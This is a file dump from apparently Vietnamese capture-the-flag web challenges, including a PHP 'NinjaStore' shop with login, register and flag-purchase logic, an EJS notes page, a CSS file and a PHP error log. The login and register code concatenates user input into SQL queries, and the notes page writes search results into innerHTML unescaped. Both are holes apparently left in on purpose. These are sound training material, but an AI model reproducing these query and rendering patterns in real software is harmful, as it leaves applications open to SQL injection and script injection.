19 |                 .card{width:340px;background:var(--card);padding:24px;border-radius:12px;box-shadow:0 6px 20px rgba(32,33,36,0.08);text-align:center}
20 |                 h1{margin:0 0 8px;font-size:20px}
21 |                 p.lead{margin:0 0 18px;color:var(--muted);font-size:13px}
22 |                 .field{margin-bottom:12px;text-align:left}
23 |                 label{display:block;font-size:13px;margin-bottom:6px;color:#111827}
24 |                 input[type="text"],input[type="password"]{
25 |                   width:100%;padding:10px 12px;border-radius:8px;border:1px solid #e6e9ef;font-size:14px
26 |                 }
27 |                 .btn{
28 |                   display:inline-block;width:100%;padding:10px 12px;border-radius:8px;border:0;background:var(--accent);
29 |                   color:#fff;font-weight:600;cursor:pointer;font-size:14px;margin-top:8px;
30 |                 }
31 |                 .hint{font-size:12px;color:var(--muted);margin-top:10px}
32 |                 .error{color:#b91c1c;font-size:13px;margin-top:8px}
33 |                 .small-link{font-size:13px;color:var(--accent);text-decoration:none}
34 |                 .row{display:flex;gap:8px}
35 |                 .flex-1{flex:1}
36 |               </style>
37 |             </head>
38 |             <body>
39 |               <main class="card" role="main">
40 |                 <h1>Đăng nhập</h1>
41 |                 <p class="lead">Vào thôi</p>
42 | 
43 |                 <form id="loginForm" method="POST" action="login.php" novalidate>
44 |                   <div class="field">
45 |                     <label for="username">Username</label>
46 |                     <input id="username" name="username" type="text" autocomplete="username" required />
47 |                   </div>
48 | 
49 |                   <div class="field">
50 |                     <label for="password">Password</label>
51 |                     <input id="password" name="password" type="password" autocomplete="current-password" required />
52 |                   </div>
53 | 
54 |                   <div id="error" class="error" aria-live="polite" style="display:none"></div>
55 | 
56 |                   <button type="submit" class="btn">Đăng nhập</button>
57 | 
58 |                   <p class="hint">Chưa có tài khoản? <a href="register.php" class="small-link">Đăng ký</a></p>
59 |                 </form>
60 |               </main>
61 |             </body>
62 |             </html>
63 |         EOF
64 |     );
65 |     
66 |     foreach (array("username", "password") as $value) {
67 |         if (empty($_POST[$value])) die("<aside>Missing parameter!</aside>");
68 |         waf($_POST[$value]);
69 |     }
70 | 
71 |     if (strlen($_POST["username"]) > 26) die("<aside>Username too long<aside>");
72 |     $result = $connection->query(sprintf('SELECT * FROM users WHERE username="%s" AND password="%s" limit 0,1', $_POST["username"], md5($_POST["password"])))->fetch_assoc();
73 |     if(empty($result))
74 |         die(<<<EOF
75 |             <strong>Username or password is wrong</strong>
76 |             <meta http-equiv="refresh" content="1;url=login.php" />
77 |         EOF);
78 |     else {
79 |         $_SESSION["username"] = $result['username'];
80 |         $_SESSION["uid"] = $result['uid'];
81 |         die(<<<EOF
82 |             <strong>Welcome brooo!! Buy flag with me !!!! </strong>
83 |             <meta http-equiv="refresh" content="1;url=index.php" />
84 |         EOF);
85 |     }
86 | 
87 | ?>
88 |     


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/challenge/views/index.ejs:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |   <meta charset="UTF-8">
  5 |   <title>All Notes</title>
  6 |   <style>
  7 |     body {
  8 |       background: #f5f7fa;
  9 |       font-family: Arial, sans-serif;
 10 |     }
 11 |     .container {
 12 |       max-width: 80%;
 13 |       margin: 40px auto 0 auto;
 14 |       padding: 24px 32px;
 15 |       background: #fff;
 16 |       border-radius: 12px;
 17 |       box-shadow: 0 2px 12px rgba(33,150,243,0.08);
 18 |     }
 19 |     h2 {
 20 |       text-align: center;
 21 |       margin-bottom: 24px;
 22 |       color: #2196f3;
 23 |     }
 24 |     .create-link, .search-link {
 25 |       display: block;
 26 |       width: fit-content;
 27 |       margin: 0 auto 18px auto;
 28 |       padding: 8px 18px;
 29 |       background: #2196f3;
 30 |       color: #fff;
 31 |       border-radius: 5px;
 32 |       text-decoration: none;
 33 |       font-weight: bold;
 34 |       transition: background 0.2s;
 35 |     }
 36 |     .create-link:hover, .search-link:hover {
 37 |       background: #1769aa;
 38 |     }
 39 |     table { 
 40 |       border-collapse: collapse; 
 41 |       width: 100%; 
 42 |       margin: 0 auto;
 43 |       background: #fafbfc;
 44 |     }
 45 |     th, td { 
 46 |       border: 1px solid #ccc; 
 47 |       padding: 10px 14px; 
 48 |       text-align: left; 
 49 |     }
 50 |     th {
 51 |       background: #2196f3;
 52 |       color: #fff;
 53 |       font-weight: bold;
 54 |       letter-spacing: 1px;
 55 |     }
 56 |     tr:nth-child(even) { background: #f9f9f9; }
 57 |     tr:hover { background: #e3f2fd; }
 58 |   </style>
 59 | </head>
 60 | <body>
 61 |   <div class="container">
 62 |     <h2>All Notes</h2>
 63 |     <form method="POST" action="/search" id="searchForm" style="margin-bottom: 24px; text-align: center;">
 64 |       <input type="text" id="search" name="search" placeholder="Search notes..." style="padding:8px 14px; width: 300px; border-radius: 5px; border:1px solid #b3c6e0;">
 65 |       <button type="submit" style="padding:8px 18px; background:#2196f3; color:#fff; border:none; border-radius:5px; font-weight:bold; cursor:pointer;">Search</button>
 66 |     </form>
 67 |     <a href="/create" class="create-link">Create new note</a>
 68 |     <table>
 69 |       <thead>
 70 |         <tr>
 71 |           <th>Note ID</th>
 72 |           <th>Title</th>
 73 |           <th>Content</th>
 74 |           <th>Owner</th>
 75 |           <th>Created At</th>
 76 |         </tr>
 77 |       </thead>
 78 |       <tbody>
 79 |         <% notes.forEach(note => { %>
 80 |           <tr>
 81 |             <td><%= note.note_id %></td>
 82 |             <td><%= note.title %></td>
 83 |             <td><%= note.content %></td>
 84 |             <td><%= note.created_by  %></td>
 85 |             <td><%= note.created_at %></td>
 86 |           </tr>
 87 |         <% }) %>
 88 |       </tbody>
 89 |     </table>
 90 | 
 91 |   </div>
 92 | </body>
 93 | </html>
 94 | 
 95 | <script>
 96 |   document.getElementById('searchForm').addEventListener('submit', async function(e) {
 97 |     e.preventDefault();
 98 |     
 99 |     const data = {
100 |       search: document.getElementById('search').value,
101 |       order_by: "note_id",
102 |       created_by: ""
103 |     };
104 |     
105 |     const res = await fetch('/search', {
106 |       method: 'POST',
107 |       headers: { 'Content-Type': 'application/json' },
108 |       body: JSON.stringify(data)
109 |     });
110 | 
111 |     const result = await res.json();
112 | 
113 |     if (res.ok && result.code === 200) {
114 |       document.body.innerHTML = `
115 |         <div class="container">
116 |           <h2>Search Results</h2>
117 |           <a href="/" class="create-link">Back to All Notes</a>
118 |           <table>
119 |             <thead>
120 |               <tr>
121 |                 <th>Note ID</th>
122 |                 <th>Title</th>
123 |                 <th>Content</th>
124 |                 <th>Owner</th>
125 |                 <th>Created At</th>
126 |               </tr>
127 |             </thead>
128 |             <tbody>
129 |               ${result.data.map(note => `
130 |                 <tr>
131 |                   <td>${note.note_id}</td>
132 |                   <td>${note.title}</td>
133 |                   <td>${note.content}</td>
134 |                   <td>${note.created_by}</td>
135 |                   <td>${note.created_at}</td>
136 |                 </tr>
137 |               `).join('')}
138 |             </tbody>
139 |           </table>
140 |         </div>
141 |       `;
142 |     } else {
143 |       alert(result.message || "Không thể tìm kết quả!");
144 |     }
145 | 
146 |   });
147 | </script>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/index.php:
--------------------------------------------------------------------------------
  1 | <?php require 'config.php'; ?>
  2 | 
  3 | <?php
  4 | if (empty($_SESSION['username']) || empty($_SESSION['uid']) )
  5 |     die(<<<EOF
  6 |         <meta http-equiv="refresh" content="0;url=login.php" />
  7 |     EOF);
  8 | 
  9 | if ( isset($_GET["buy"]) ) {
 10 |     
 11 |     // Check if product is available
 12 |     $character = $connection->prepare("SELECT * FROM ninja WHERE slug_name = ?");
 13 |     $character->bind_param("s", $_GET["buy"]);
 14 |     $character->execute();
 15 |     $result = $character->get_result()->fetch_assoc();
 16 |     // var_dump($result);
 17 | 
 18 |     if (!$result) die("<aside>Product not available yet</aside>");
 19 |     // Get user balance
 20 |     $coin = $connection->query(sprintf("SELECT coin FROM coins WHERE uid=%d limit 0,1", (int)$_SESSION["uid"]))->fetch_assoc()["coin"];
 21 | 
 22 |     if ($result["slug_name"] === "flag") {
 23 |         if ( (int)$coin === 1337) { 
 24 |             $connection->query(sprintf("UPDATE coins SET coin=%d-1337 WHERE uid=%d", (int)$coin, (int)$_SESSION["uid"]));
 25 |             die("<strong>Nice brooo!! Are you a millionaire??? Here your flag: $FLAG</strong>");
 26 |         } 
 27 |         else 
 28 |             die("<strong>Try harder!!! =))) </strong>");
 29 |     } else {
 30 |         if ( (int)$coin >= (int)$result["price"]) {
 31 |             $result = $connection->query(sprintf("UPDATE coins SET coin=%d-%d WHERE uid=%d", (int)$coin, (int)$result["price"], (int)$_SESSION["uid"]));
 32 |             if ($result) 
 33 |                 die(sprintf("<strong>Buy successfully!!!</strong>"));
 34 |         }
 35 |         else 
 36 |             die("<strong>Coin do not enough!! =(( </strong>");
 37 |     }
 38 | }
 39 | ?>
 40 | 
 41 | <!doctype html>
 42 | <html lang="vi">
 43 | <head>
 44 |   <meta charset="utf-8" />
 45 |   <meta name="viewport" content="width=device-width,initial-scale=1" />
 46 |   <title>NinjaShop — Sản phẩm</title>
 47 |   <style>
 48 |     body {font-family: Arial, sans-serif; margin: 0; padding: 0; background: #f5f5f5;}
 49 |     header {
 50 |       background: #222; 
 51 |       color: #fff; 
 52 |       padding: 16px; 
 53 |       display: flex; 
 54 |       justify-content: space-between; 
 55 |       align-items: center;
 56 |     }
 57 |     header .title {
 58 |       text-align: left;
 59 |     }
 60 |     header h1 {margin: 0; font-size: 20px;}
 61 |     header p {margin: 4px 0 0; font-size: 14px; color: #ccc;}
 62 |     .nav-buttons {
 63 |       display: flex;
 64 |       gap: 10px;
 65 |     }
 66 |     .nav-buttons a {
 67 |       color: #fff;
 68 |       text-decoration: none;
 69 |       background: #444;
 70 |       padding: 6px 12px;
 71 |       border-radius: 4px;
 72 |       font-size: 14px;
 73 |       transition: background 0.2s;
 74 |     }
 75 |     .nav-buttons a:hover {
 76 |       background: #666;
 77 |     }
 78 |     .container {padding: 20px;}
 79 |     .grid {display: grid; grid-template-columns: repeat(auto-fit,minmax(200px,1fr)); gap: 16px;}
 80 |     .card {background: #fff; border-radius: 8px; padding: 16px; text-align: center; box-shadow: 0 2px 5px rgba(0,0,0,0.1);}
 81 |     .thumb {font-size: 60px; margin-bottom: 10px;}
 82 |     .name {font-weight: bold; font-size: 18px; margin-bottom: 6px;}
 83 |     .price {color: #d9534f; font-weight: bold; margin-bottom: 10px;}
 84 |     .btn-buy {display: inline-block; padding: 8px 12px; background: #007bff; color: #fff; text-decoration: none; border-radius: 4px; font-size: 14px;}
 85 |     .btn-buy:hover {background: #0056b3;}
 86 |   </style>
 87 | </head>
 88 | <body>
 89 |   <header>
 90 |     <div class="title">
 91 |         <h1>NinjaShop</h1>
 92 |         <p>Bán Ninja nhưng không bán PoC</p>
 93 |     </div>
 94 |     <div class="nav-buttons">
 95 |       <a href="profile.php">Profile</a>
 96 |       <a href="logout.php">Logout</a>
 97 |     </div>
 98 |   </header>
 99 | 
100 |   <main class="container">
101 |     <section class="grid">
102 |       <?php
103 |         
104 |         $products = $connection->query("SELECT * FROM ninja");
105 |         while($row = $products->fetch_assoc()) {
106 |           echo <<<EOF
107 |             <div class="card">
108 |               <div class="thumb"><img width=100px height=100px src="./imgs/{$row["slug_name"]}.png"></div>
109 |               <div class="name">{$row["ninja_name"]}</div>
110 |               <div class="price">{$row["price"]} 💰</div>
111 |               <a href="index.php?buy={$row["slug_name"]}" class="btn-buy">Mua ngay</a>
112 |             </div>
113 |           EOF;
114 |         }
115 |       ?>
116 |     </section>
117 |   </main>
118 | </body>
119 | </html>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/register.php:
--------------------------------------------------------------------------------
  1 | <?php require 'config.php';
  2 | 
  3 |     if (!empty($_SESSION['username']) && !empty($_SESSION['uid']) )
  4 |         header('Location: index.php');
  5 |     
  6 |     if ( $_SERVER['REQUEST_METHOD'] !== "POST" )
  7 |         die(<<<EOF
  8 |             <!doctype html>
  9 |             <html lang="vi">
 10 |             <head>
 11 |               <meta charset="utf-8" />
 12 |               <meta name="viewport" content="width=device-width,initial-scale=1" />
 13 |               <title>Register</title>
 14 |               <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+JP:wght@400;600&display=swap" rel="stylesheet">
 15 |               <style>
 16 |                 body {
 17 |                   font-family: 'Noto Sans JP', sans-serif;
 18 |                   margin: 0; padding: 0;
 19 |                   background: #f5f5f5;
 20 |                 }
 21 |                 header {
 22 |                   background: #222; color: #fff; padding: 16px;
 23 |                   text-align: center;
 24 |                 }
 25 |                 header h1 {margin: 0; font-size: 22px;}
 26 |                 main {
 27 |                   max-width: 400px; margin: 40px auto;
 28 |                   background: #fff; padding: 20px;
 29 |                   border-radius: 8px; box-shadow: 0 2px 6px rgba(0,0,0,0.1);
 30 |                 }
 31 |                 form {display: flex; flex-direction: column; gap: 16px;}
 32 |                 label {font-weight: 600; text-align: left;}
 33 |                 input {
 34 |                   padding: 10px; border: 1px solid #ccc;
 35 |                   border-radius: 4px; font-size: 14px;
 36 |                 }
 37 |                 input:focus {border-color: #007bff; outline: none;}
 38 |                 .btn-submit {
 39 |                   padding: 10px; font-size: 15px;
 40 |                   background: #007bff; color: #fff; border: none;
 41 |                   border-radius: 4px; cursor: pointer;
 42 |                   transition: background 0.2s;
 43 |                 }
 44 |                 .btn-submit:hover {background: #0056b3;}
 45 |                 .note {margin-top: 10px; font-size: 14px; text-align: center;}
 46 |                 .note a {color: #007bff; text-decoration: none;}
 47 |                 .note a:hover {text-decoration: underline;}
 48 |               </style>
 49 |             </head>
 50 |             <body>
 51 |               <header>
 52 |                 <h1>Register</h1>
 53 |               </header>
 54 | 
 55 |               <main>
 56 |                 <form action="register.php" method="post">
 57 |                   <div>
 58 |                     <label for="username">Username: </label>
 59 |                     <input type="text" id="username" name="username" required>
 60 |                   </div>
 61 |                   <div>
 62 |                     <label for="fullname">Fullname: </label>
 63 |                     <input type="text" id="fullname" name="fullname" required>
 64 |                   </div>
 65 |                   <div>
 66 |                     <label for="password">Password: </label>
 67 |                     <input type="password" id="password" name="password" required>
 68 |                   </div>
 69 |                   <button type="submit" class="btn-submit">Register</button>
 70 |                 </form>
 71 |                 <p class="note">Have an account? <a href="login.php">Login</a></p>
 72 |               </main>
 73 |             </body>
 74 |             </html>
 75 |         EOF);
 76 | 
 77 |     foreach (array("username", "password", "fullname") as $value) {
 78 |         if (empty($_POST[$value])) die("<aside>Missing parameter!</aside>");
 79 |         waf($_POST[$value]);
 80 |     }
 81 |     if (strlen($_POST["username"]) > 15) die("<aside>Username too long<aside>");
 82 |     if (strlen($_POST["fullname"]) > 10) die("<aside>Fullname too long<aside>");
 83 |     
 84 |     // check account is exists
 85 |     if ( $connection->query(sprintf('SELECT * FROM users WHERE username="%s" and password="%s"', $_POST["username"], md5($_POST["password"])))->fetch_assoc()["uid"] )
 86 |         die("<strong>User is exists</strong>");
 87 | 
 88 |     $result = $connection->query(sprintf('INSERT INTO users(username, password, fullname) VALUES ("%s", "%s", "%s")', $_POST["username"], md5($_POST["password"]), $_POST["fullname"]));
 89 | 
 90 |     if ($result) {
 91 |         $uid = $connection->query(sprintf('SELECT uid FROM users WHERE username="%s" and password="%s" limit 0,1', $_POST["username"], md5($_POST["password"])))->fetch_assoc()["uid"];
 92 |         if ($uid) {
 93 |             if ($connection->query(sprintf('INSERT INTO coins(coin, uid, update_count) VALUES (100, %d, 0)', (int)$uid)))
 94 |                 die(<<<EOF
 95 |                     <strong>User created successfully</strong>
 96 |                     <script>
 97 |                         setTimeout(() => {
 98 |                             window.location = "index.php";
 99 |                         }, 3000);
100 |                     </script>
101 |                 EOF);
102 |         }
103 |     } else die("<strong>Something went wrong! Try again!</strong>");
104 | ?>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/static/css/login.css:
--------------------------------------------------------------------------------
  1 | 
  2 | /* BASIC */
  3 | 
  4 | html {
  5 |   background-color: #56baed;
  6 | }
  7 | 
  8 | body {
  9 |   font-family: "Poppins", sans-serif;
 10 |   height: 100vh;
 11 | }
 12 | 
 13 | a {
 14 |   color: #92badd;
 15 |   display:inline-block;
 16 |   text-decoration: none;
 17 |   font-weight: 400;
 18 | }
 19 | 
 20 | h2 {
 21 |   text-align: center;
 22 |   font-size: 16px;
 23 |   font-weight: 600;
 24 |   text-transform: uppercase;
 25 |   display:inline-block;
 26 |   margin: 40px 8px 10px 8px; 
 27 |   color: #cccccc;
 28 | }
 29 | 
 30 | 
 31 | 
 32 | /* STRUCTURE */
 33 | 
 34 | .wrapper {
 35 |   display: flex;
 36 |   align-items: center;
 37 |   flex-direction: column; 
 38 |   justify-content: center;
 39 |   width: 100%;
 40 |   min-height: 100%;
 41 |   padding: 20px;
 42 | }
 43 | 
 44 | #formContent {
 45 |   -webkit-border-radius: 10px 10px 10px 10px;
 46 |   border-radius: 10px 10px 10px 10px;
 47 |   background: #fff;
 48 |   padding: 30px;
 49 |   width: 90%;
 50 |   max-width: 450px;
 51 |   position: relative;
 52 |   padding: 0px;
 53 |   -webkit-box-shadow: 0 30px 60px 0 rgba(0,0,0,0.3);
 54 |   box-shadow: 0 30px 60px 0 rgba(0,0,0,0.3);
 55 |   text-align: center;
 56 | }
 57 | 
 58 | #formFooter {
 59 |   background-color: #f6f6f6;
 60 |   border-top: 1px solid #dce8f1;
 61 |   padding: 25px;
 62 |   text-align: center;
 63 |   -webkit-border-radius: 0 0 10px 10px;
 64 |   border-radius: 0 0 10px 10px;
 65 | }
 66 | 
 67 | 
 68 | 
 69 | /* TABS */
 70 | 
 71 | h2.inactive {
 72 |   color: #cccccc;
 73 | }
 74 | 
 75 | h2.active {
 76 |   color: #0d0d0d;
 77 |   border-bottom: 2px solid #5fbae9;
 78 | }
 79 | 
 80 | 
 81 | 
 82 | /* FORM TYPOGRAPHY*/
 83 | 
 84 | input[type=button], input[type=submit], input[type=reset]  {
 85 |   background-color: #56baed;
 86 |   border: none;
 87 |   color: white;
 88 |   padding: 15px 80px;
 89 |   text-align: center;
 90 |   text-decoration: none;
 91 |   display: inline-block;
 92 |   text-transform: uppercase;
 93 |   font-size: 13px;
 94 |   -webkit-box-shadow: 0 10px 30px 0 rgba(95,186,233,0.4);
 95 |   box-shadow: 0 10px 30px 0 rgba(95,186,233,0.4);
 96 |   -webkit-border-radius: 5px 5px 5px 5px;
 97 |   border-radius: 5px 5px 5px 5px;
 98 |   margin: 5px 20px 40px 20px;
 99 |   -webkit-transition: all 0.3s ease-in-out;
100 |   -moz-transition: all 0.3s ease-in-out;
101 |   -ms-transition: all 0.3s ease-in-out;
102 |   -o-transition: all 0.3s ease-in-out;
103 |   transition: all 0.3s ease-in-out;
104 | }
105 | 
106 | input[type=button]:hover, input[type=submit]:hover, input[type=reset]:hover  {
107 |   background-color: #39ace7;
108 | }
109 | 
110 | input[type=button]:active, input[type=submit]:active, input[type=reset]:active  {
111 |   -moz-transform: scale(0.95);
112 |   -webkit-transform: scale(0.95);
113 |   -o-transform: scale(0.95);
114 |   -ms-transform: scale(0.95);
115 |   transform: scale(0.95);
116 | }
117 | 
118 | input[type=text] {
119 |   background-color: #f6f6f6;
120 |   border: none;
121 |   color: #0d0d0d;
122 |   padding: 15px 32px;
123 |   text-align: center;
124 |   text-decoration: none;
125 |   display: inline-block;
126 |   font-size: 16px;
127 |   margin: 5px;
128 |   width: 85%;
129 |   border: 2px solid #f6f6f6;
130 |   -webkit-transition: all 0.5s ease-in-out;
131 |   -moz-transition: all 0.5s ease-in-out;
132 |   -ms-transition: all 0.5s ease-in-out;
133 |   -o-transition: all 0.5s ease-in-out;
134 |   transition: all 0.5s ease-in-out;
135 |   -webkit-border-radius: 5px 5px 5px 5px;
136 |   border-radius: 5px 5px 5px 5px;
137 | }
138 | 
139 | input[type=text]:focus {
140 |   background-color: #fff;
141 |   border-bottom: 2px solid #5fbae9;
142 | }
143 | 
144 | input[type=text]:placeholder {
145 |   color: #cccccc;
146 | }
147 | 
148 | 
149 | 
150 | /* ANIMATIONS */
151 | 
152 | /* Simple CSS3 Fade-in-down Animation */
153 | .fadeInDown {
154 |   -webkit-animation-name: fadeInDown;
155 |   animation-name: fadeInDown;
156 |   -webkit-animation-duration: 1s;
157 |   animation-duration: 1s;
158 |   -webkit-animation-fill-mode: both;
159 |   animation-fill-mode: both;
160 | }
161 | 
162 | @-webkit-keyframes fadeInDown {
163 |   0% {
164 |     opacity: 0;
165 |     -webkit-transform: translate3d(0, -100%, 0);
166 |     transform: translate3d(0, -100%, 0);
167 |   }
168 |   100% {
169 |     opacity: 1;
170 |     -webkit-transform: none;
171 |     transform: none;
172 |   }
173 | }
174 | 
175 | @keyframes fadeInDown {
176 |   0% {
177 |     opacity: 0;
178 |     -webkit-transform: translate3d(0, -100%, 0);
179 |     transform: translate3d(0, -100%, 0);
180 |   }
181 |   100% {
182 |     opacity: 1;
183 |     -webkit-transform: none;
184 |     transform: none;
185 |   }
186 | }
187 | 
188 | /* Simple CSS3 Fade-in Animation */
189 | @-webkit-keyframes fadeIn { from { opacity:0; } to { opacity:1; } }
190 | @-moz-keyframes fadeIn { from { opacity:0; } to { opacity:1; } }
191 | @keyframes fadeIn { from { opacity:0; } to { opacity:1; } }
192 | 
193 | .fadeIn {
194 |   opacity:0;
195 |   -webkit-animation:fadeIn ease-in 1;
196 |   -moz-animation:fadeIn ease-in 1;
197 |   animation:fadeIn ease-in 1;
198 | 
199 |   -webkit-animation-fill-mode:forwards;
200 |   -moz-animation-fill-mode:forwards;
201 |   animation-fill-mode:forwards;
202 | 
203 |   -webkit-animation-duration:1s;
204 |   -moz-animation-duration:1s;
205 |   animation-duration:1s;
206 | }
207 | 
208 | .fadeIn.first {
209 |   -webkit-animation-delay: 0.4s;
210 |   -moz-animation-delay: 0.4s;
211 |   animation-delay: 0.4s;
212 | }
213 | 
214 | .fadeIn.second {
215 |   -webkit-animation-delay: 0.6s;
216 |   -moz-animation-delay: 0.6s;
217 |   animation-delay: 0.6s;
218 | }
219 | 
220 | .fadeIn.third {
221 |   -webkit-animation-delay: 0.8s;
222 |   -moz-animation-delay: 0.8s;
223 |   animation-delay: 0.8s;
224 | }
225 | 
226 | .fadeIn.fourth {
227 |   -webkit-animation-delay: 1s;
228 |   -moz-animation-delay: 1s;
229 |   animation-delay: 1s;
230 | }
231 | 
232 | /* Simple CSS3 Fade-in Animation */
233 | .underlineHover:after {
234 |   display: block;
235 |   left: 0;
236 |   bottom: -10px;
237 |   width: 0;
238 |   height: 2px;
239 |   background-color: #56baed;
240 |   content: "";
241 |   transition: width 0.2s;
242 | }
243 | 
244 | .underlineHover:hover {
245 |   color: #0d0d0d;
246 | }
247 | 
248 | .underlineHover:hover:after{
249 |   width: 100%;
250 | }
251 | 
252 | 
253 | 
254 | /* OTHERS */
255 | 
256 | *:focus {
257 |     outline: none;
258 | } 
259 | 
260 | #icon {
261 |   width:60%;
262 | }
263 | 


--------------------------------------------------------------------------------
/Meetup 2020/chall3/error_log:
--------------------------------------------------------------------------------
 1 | [29-Oct-2020 09:38:00 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
 2 | [29-Oct-2020 09:38:00 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
 3 | [01-Nov-2020 15:54:24 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
 4 | [01-Nov-2020 15:54:24 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
 5 | [01-Nov-2020 15:54:39 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
 6 | [01-Nov-2020 15:54:39 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
 7 | [01-Nov-2020 15:54:45 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
 8 | [01-Nov-2020 15:55:08 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
 9 | [01-Nov-2020 15:56:43 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
10 | [01-Nov-2020 15:57:15 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
11 | [01-Nov-2020 15:58:12 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
12 | [01-Nov-2020 16:00:19 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
13 | [01-Nov-2020 16:00:33 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
14 | [02-Nov-2020 10:22:53 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
15 | [02-Nov-2020 10:22:53 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
16 | [02-Nov-2020 10:22:58 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
17 | [02-Nov-2020 11:00:09 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
18 | [02-Nov-2020 11:00:09 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
19 | [02-Nov-2020 11:05:35 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
20 | [02-Nov-2020 11:05:35 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
21 | [02-Nov-2020 11:05:43 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
22 | [02-Nov-2020 11:05:43 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
23 | [02-Nov-2020 11:19:51 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
24 | [02-Nov-2020 11:19:51 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
25 | [02-Nov-2020 11:20:31 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
26 | [02-Nov-2020 11:20:31 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
27 | [02-Nov-2020 11:21:07 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
28 | [02-Nov-2020 11:21:07 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
29 | [02-Nov-2020 11:21:28 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
30 | [02-Nov-2020 11:21:28 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
31 | [02-Nov-2020 11:21:31 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
32 | [02-Nov-2020 11:21:31 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
33 | [02-Nov-2020 11:21:54 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
34 | [02-Nov-2020 11:21:54 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
35 | [02-Nov-2020 11:22:35 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
36 | [02-Nov-2020 11:22:35 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
37 | [02-Nov-2020 11:24:03 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
38 | [02-Nov-2020 11:24:03 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
39 | [02-Nov-2020 11:24:04 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
40 | [02-Nov-2020 11:24:04 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
41 | [02-Nov-2020 11:24:24 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
42 | [02-Nov-2020 11:24:24 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
43 | [02-Nov-2020 11:24:40 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
